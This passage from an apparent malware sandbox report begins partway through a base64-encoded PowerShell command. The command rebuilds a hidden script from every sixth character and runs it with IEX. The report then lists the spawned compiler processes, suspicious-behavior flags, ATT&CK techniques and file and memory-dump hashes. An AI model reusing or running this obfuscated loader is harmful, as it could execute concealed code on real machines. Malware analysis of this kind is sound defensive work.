B1AG4AZABlAG4AQwBoAHIAbwBuAHQAUgBlAHQAcgB0ACAAcwB1AGwAcABoAHYAdgBlAGwAbABlADIAdQB0AG4AawBlACkAUgBlAHYAYQBuADsACgBiAGUAYQB1AHAAfQAKAFMAdABpAGwAZQAiAE0AYQBuAHQAaQBAAAoAVQBjAGgAZQBlACQARgByAGEAbQBtAE8ARgByAGUAZABuAHYAUABvAHIAdABvAGUATABpAHIAawBhAHIARwBsAGEAbgBkADMAdgBlAG4AZQByAD0AVABhAHAAaQBzAFsARgByAGUAbQBzAE8AUgB5AHQAdABlAHYAUgBpAHYAbgBpAGUAUABzAHkAYwBoAHIATABhAHUAcgBpADEARABpAHMAYwBlAF0AbQBhAGQAbwBsADoAUgBpAGcAcwBiADoAUwBwAHIAbwBnAFYAYgBpAGEAdABvAGkAQQBkAG8AcAB0AHIAUAByAGUAYwBvAHQAUgBlAG4AbwB2AHUAVABuAGQAYgBhAGEAVgBhAG4AZABiAGwARwBlAG4AcwBrAEEAVQBnAHUAbgBzAGwAUgByAGcAcwBtAGwAQgBlAHMAdAB5AG8AUwBpAG4AdQBhAGMAQgBlAGMAbwBtACgARABvAGcAbQBlADAAUwBrAHUAbQBtACwAUgBlAGcAaQBzADEATgBvAG4AYwBoADAAVwBhAHUAYwBoADQATQBhAGcAaQBjADgAUABlAHQAcgBvADUAVABpAGwAbABpADcAUgBpAG4AZwByADYARQBuAHMAaQBkACwAQQBkAG8AcgBhADEAQgBhAHMAcgBlADIAUgBzAG8AbgBuADIAQgB1AG4AZABmADgASgBlAHIAZQBtADgAUwB0AHkAbABvACwATABuAGkAbgBkADYAdQB0AGkAcwBtADQAVgBhAGwAdQB0ACkACgBQAGUAbgB0AGEAJABCAGUAawBsAGEAVABPAG4AZQBzAHQAZQBFAHgAcABsAG8AcwBPAGIAagBlAGsAdABFAHMAYwBvAGMAYQBGAG8AcgBkAGUAYwBGAG8AcgBzAGEAeQBCAGkAdAB0AGUAcABEAGUAcwB0AGkAbwBJAG0AcABsAGUAZABCAHIAZQBkAGIAPQBXAGkAbgBkAGkAKABQAHIAbwB2AG8ARwBBAHMAdAByAG8AZQBOAG8AbgBpAHIAdABEAHUAYgBsAGUALQBCAGUAcwBsAGEASQBCAGUAcAByAGEAdABIAGUAbQBtAGUAZQBaAGEAbgB6AGkAbQBFAG4AZwBhAG4AUABIAGEAbQBhAHQAcgBMAHkAbQBwAGgAbwBSAGgAZQBpAG4AcABmAG8AcgBnAHIAZQBIAHkAcABlAHIAcgBUAHIAYQB2AGUAdABTAHQAYQBrAGwAeQBPAHAAdABhAGcAIABSAGEAYQBzAHkALQBTAGoAbABzAHMAUABXAGgAaQB0AGUAYQBPAHAAZwBhAHYAdABPAHQAbwBsAG8AaABTAGEAawBrAGEAIABFAHgAcABpAGEAIgBBAHAAcgBpAG8ASABBAGsAawB2AGkASwBFAGwAbABlAHIAQwBTAGsAcgBpAHYAVQBGAG8AcgBlAG0AOgBWAG8AbQBtAGUAXABVAG4AYwBlAGEAUwBQAGwAdQByAGEAbwBBAGQAZQBuAG8AZgBMAG8AdwBlAHIAdABSAGUAagBuAGUAdwBDAGUAbgB0AHIAYQBGAGUAcgBsAHkAcgBTAHQAYQBkAHMAZQBGAHIAdQBnAHQAXABGAHIAcwB0AGUARABUAGUAbgBkAHIAZABTAHkAcwB0AGUAcwBLAGwAYQBwAGgAbwBUAGEAawBuAGkAZgBVAGQAZABhAG4AZgBQAGUAbgBkAGEAZQBNAGUAcwBvAGcAcgBTAHAAeQB0AGsAIgBzAHQAbwByAHQAKQBVAG4AZQBuAGcALgBNAGEAbABhAGMAVABFAGMAdQB2AGUAaAB2AGkAegBhAHIAaQBEAHkAcgBlAGgAcgBLAGEAYgB5AHMAZABPAHYAZQByAHMAbABNAGEAdABlAG0AaQBMAGkAcwB0AGUAbgAKAE4AcgBlAG4AZAAkAFIAaQBnAHMAZABVAE0AaQBuAHUAdABuAGMAcgBhAHcAZABhAEEAZgBzAGwAYQBiAEoAYQBlAHYAbgBqAFAAcgBqAHMAZQB1AEEAawB0AGkAZQByAEoAbwByAGQAZgAgAEMAbwBuAHQAZQA9AEEAZgBnAGEAbgAgAFMAYwBpAHMAcwBbAEEAbAB2AG8AcgBTAFIAZQBuAGUAdwB5AFkAbgBnAHMAdABzAEUAdAB0AGUAcgB0AEsAbABpAHAAcABlAEwAZwBlAGEAdABtAFQAYQBhAHIAZQAuAEYAbwByAGsAbwBDAEYAbwByAGgAYQBvAEIAYQBsAHQAegBuAEQAZQBoAHkAZAB2AFIAbwBkAGwAcwBlAEMAcgBvAHQAYQByAFMAdQByAG0AdQB0AEYAZQBqAGwAawBdAFUAbgBkAGUAcgA6AGYAbwByAG0AYQA6AGYAcgBpAG0AaQBGAFAAcwB5AGMAaAByAEwAYQByAHkAbgBvAFMAbwBmAGYAaQBtAEEAbgB0AGkAcQBCAFMAbABhAGcAdABhAFIAZQBrAG8AcgBzAFYAYQBjAGEAbgBlAFMAbwBmAGEAZwA2AFAAdQBuAGcAZQA0AEIAZQByAGUAZABTAEcAdQBsAHIAYQB0AHMAdABvAHIAawByAFMAawBpAHAAawBpAFMAdAB1AHQAdABuAEQAZQBjAGUAbgBnAGEAdQB0AG8AcAAoAFMAcABpAHIAYQAkAE8AbwBsAG8AZwBUAEIAeQBnAGIAYQBlAFMAdAB5AHIAdABzAHAAaABvAHQAbwB0AE8AcABrAGwAYgBhAFYAcwBrAGUAZABjAE4AeQBtAGEAYQB5AFYAYQBhAGQAcwBwAFQAcgBpAG4AZABvAFMAaQBtAHAAbABkAEQAZQBwAGwAbwApAAoAVQBwAHcAYQByAFsAUgBpAGQAZABlAFMAQgBsAGEAYwBrAHkATgBhAHQAdQByAHMAQgB1AHMAdABoAHQARABpAHAAcwBvAGUATgBlAHQAdABlAG0AVgB1AHIAZABlAC4AQgBvAG4AZABlAFIAZwBsAGkAcwBzAHUAVAByAG8AYwBoAG4ASwBhAGEAbAByAHQAQgBhAG4AagBvAGkAUgBlAGYAbwByAG0ASQBuAGQAdQBjAGUAVABvAHUAcgBpAC4ARgBvAHIAZwBlAEkAVQBuAGQAZQByAG4AUwB0AHIAYQBuAHQAawBsAGkAbgBnAGUAagB1AHYAZQBsAHIAQgBlAGcAdQBuAG8AUgBlAHYAYQBsAHAATABlAHQAaABlAFMASQBuAGQAawBhAGUAVAByAGEAdgBlAHIAVABvAGwAZABrAHYAcgBlAHAAZQByAGkAbwByAGQAawBuAGMAUwBhAHQAYwBoAGUAUwBwAGkAbAB2AHMASwBsAGkAbQBhAC4ATgBvAHAAcgBlAE0ASwByAHkAZABzAGEATABpAGcAZQBmAHIATQBhAHMAcwBlAHMASABhAGEAbgBkAGgAQQByAG0AYQBnAGEAYQBuAG8AZABpAGwAYwBvAHAAeQByAF0AUAByAGUAcgBlADoASABvAHYAbQBvADoATABzAGUAaABhAEMAQgBlAHMAdwBhAG8AVQBuAGgAZQBsAHAASQBsAHMAZQBiAHkAZgBsAG8AcwBzACgARgBqAGUAbgBkACQAQQBpAHoAbwBhAFUAUgB2AHIAZABpAG4ASABhAG4AZABnAGEAYQBkAHYAbwBrAGIAVQBsAHQAcgBhAGoASwByAGEAcABzAHUAVgBlAHIAdABlAHIAbABvAHkAYQBsACwAVgBlAGoAZgBhACAAUABsAHMAZQBkADAAYwBvAG0AbQB1ACwAUwB0AGEAbABkACAAQQBsAGwAbwB0ACAAUABpAG4AZABlACQASQBuAG8AcgBkAE8ASQBtAGEAbQBhAHYASQBuAGYAbwByAGUAUwBtAGEAYQBkAHIAVQBkAHMAawBpADMAUgB1AHMAcwBpACwASQBuAGYAZQByACAATQBhAGwAdgBpACQAcABsAGkAZwB0AFUAUgBlAGEAawB0AG4AUwB0AHkAcgBlAGEAVABhAHAAZQB0AGIASABhAHUAcwBmAGoARgBvAHIAbABkAHUAVQBuAGkAbgBmAHIARgBvAHIAdABqAC4AUwBrAGkAbQBtAGMARABlAHQAYQBpAG8AVwBlAGIAbABzAHUASwBvAG0AcABsAG4ARgB1AG0AZQB3AHQATgB2AG4AZQBuACkAQwBvAHQAcwBlADsACgBTAG0AYQBhAGIAWwBJAG4AdQByAG4ATwBWAGEAZwB0AHAAdgBDAGgAYQBpAG4AZQBVAHIAYQBuAGIAcgBGAG8AcgBlAG4AMQBQAGEAYwBlAGQAXQBBAHIAaQBuAGUAOgBTAGsAdgBhAHQAOgBiAGkAcwBtAGEARQBJAGQAZQBvAGcAbgBzAGUAcgBhAGkAdQBwAGwAYQBuAG8AbQBGAG8AcgBtAGkAUwBSAGUAYQBzAHMAeQBVAG4AZAB1AGIAcwBHAHIAZABhAGcAdABVAG4AdABhAHIAZQBCAHIAaQBrAHYAbQBDAHkAcwB0AG8ATABQAHUAbgBrAGUAbwBjAGkAYwBhAHQAYwBDAGgAbwByAGkAYQBPAGIAbABpAHEAbABTAGMAaABhAHQAZQBBAHAAcABlAGEAcwBDAG8AbgBjAGkAQQBQAGgAbwByAHIAKABQAG8AaQBuAHQAJABHAGUAbQBtAG8ATwBUAGUAdgBhAG4AdgBKAG8AcgBkAGIAZQBBAGkAcgB0AGkAcgB0AGUAcgBuAGEAMwBMAGUAZABzAGEALABpAG4AZQBsAGEAIABTAHQAZQBkAG0AMABGAHUAZwB0AGQAKQBQAHIAaQBtAHQAIwAKACcAQAANAAoADQAKAA0ACgBGAG8AcgAoACQAaQA9ADUAOwAgACQAaQAgAC0AbAB0ACAAJABHAGEAcwBsAGkAZwBoAC4ATABlAG4AZwB0AGgALQAxADsAIAAkAGkAKwA9ACgANQArADEAKQApAA0ACgB7AA0ACgAJAA0ACgAJACQAQgBlAG0AdQBzAGsAIAA9ACAAJABCAGUAbQB1AHMAawAgACsAIAAkAEcAYQBzAGwAaQBnAGgALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMQApAA0ACgAJAA0ACgAJAGkAZgAgACgAJABHAGEAcwBsAGkAZwBoAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkAKwAxACwAIAAxACkAIAAtAGUAcQAgACIAYABuACIAKQAgAHsADQAKAAkACQAkAEIAZQBtAHUAcwBrACAAPQAgACQAQgBlAG0AdQBzAGsAIAArACAAIgBgAG4AIgANAAoACQAJACQAaQAgAD0AIAAkAGkAIAArACAAMQANAAoACQB9ACAACQANAAoACQAJAA0ACgAJAA0ACgB9AA0ACgANAAoADQAKAEkARQBYACAAJABCAGUAbQB1AHMAawANAAoA"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:544
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oxjbzsji.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1540
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES588E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC588D.tmp"
      4⤵
      PID:1556

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES588E.tmp

Filesize
1KB

MD5
ffe5bbcd6c89846f1b9204018cb9053a

SHA1
2ae12036ebc9f81bd4e9697aad680ba237144d45

SHA256
e857910e6400da934cdd0cfcc10d5c641581e680aac358339762c798b375941c

SHA512
5efef7c7acd39840c1b30de10a1c3f93f2de3ac12ff09ef3ad7254881ce069d932bd506bf8911199cc631a3be1ca2978346ec0cb409c15341f3e557a795a6738

Download Submit
C:\Users\Admin\AppData\Local\Temp\oxjbzsji.dll

Filesize
4KB

MD5
8ed1e7c73b77e47ded992f6e2a50da9a

SHA1
4332378b3eb2ea011cc57f4eab24e2901e85aae6

SHA256
08589d86df4a957d61cb62489e96191b4a06d23c506b9836f6e020681a07077e

SHA512
d0da034d764e0e3cc29cb3b77e0601e7f1f17c112e2fca8f5ce59a4eaf76701b8371290b4bf39ad46e9a18956dc7e9347dfad0d009c01471627eb17da955cc91

Download Submit
C:\Users\Admin\AppData\Local\Temp\oxjbzsji.pdb

Filesize
7KB

MD5
182df4903de80a7b41e17ffe2f06b586

SHA1
47f0f5bab6b2a5902a0536f6f1e38856a8d8e608

SHA256
f0fbc6b1c558fe32499b110e22619a965fce2b6b11a1bc45534b9107f5b83b53

SHA512
5d8b2651dcfb7eccf838539560b17415cf290e6d0ae209d90140603dc666bc815604c4fc19478b1efe4b3140c367e5abe48f41da3e5cfaeb40bb2033ba51b5ff

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC588D.tmp

Filesize
652B

MD5
700e5aad4e442ea28b8f4966a61f978a

SHA1
b7971097d303f8eff8ceac975ab3da2b44fc4045

SHA256
62bb82688f7523789bfeb7f76d9a62e10a26a6f5540d056eb33123d794f47bc5

SHA512
07ef84573f62f99ffd29ca0ede656af853bac0ccb849eb4d65c103d19136ed7ce96eb883924ef03b7d61747fd366f12ab54702b7f821025faa5da85baac0c374

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\oxjbzsji.0.cs

Filesize
910B

MD5
8bc6902c9554f8e17fdb227670053f69

SHA1
36bf150cb69b52688beec1483a5b0f32f7709c46

SHA256
73d4b18caad7ad9e4bd8957be138ee440008c3a27859a025136525102e9f8114

SHA512
9f8da240977b055655e7f7ed2dbd11a28bffde0799761c2e51d3473f0ee0c93510ee11e68d130b0b5b9341ec7ef0a3f62b75eeb76891491c7fb56d0b6ba37027

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\oxjbzsji.cmdline

Filesize
309B

MD5
1014d462a76a8a1ace92372eb676548b

SHA1
c54aac027c72f579586eabfb866369cae73af715

SHA256
5e1518ec352a1c1283d5130e009e68b47a6fdf063c26f423be90fb15ba22b71e

SHA512
880b3e58b1db75a9247ee1bd3c6dfe73170f7572290e164cb170fd0e6af0634b232613958a23733b329e90bf5a3d1b694c4d1a67cd07352b2b3956f70074ec12

Download Submit
memory/544-57-0x0000000073AB0000-0x000000007405B000-memory.dmp

Filesize
5.7MB

Download
memory/544-56-0x00000000757A1000-0x00000000757A3000-memory.dmp

Filesize
8KB

Download
memory/544-66-0x0000000005110000-0x0000000005210000-memory.dmp

Filesize
1024KB

Download
memory/544-67-0x0000000073AB0000-0x000000007405B000-memory.dmp

Filesize
5.7MB

Download
memory/1380-54-0x000007FEFB8B1000-0x000007FEFB8B3000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing